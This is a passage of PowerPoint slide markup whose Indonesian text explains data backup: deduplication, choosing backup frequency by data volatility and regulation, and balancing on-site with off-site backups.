              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transfer data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>duplikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Frekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pencadangan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>frekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>volatilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mandat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stabil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyeimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhirnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>frekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang optimal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cermat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> di Lokasi dan di Luar Lokasi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hard drive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kaset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
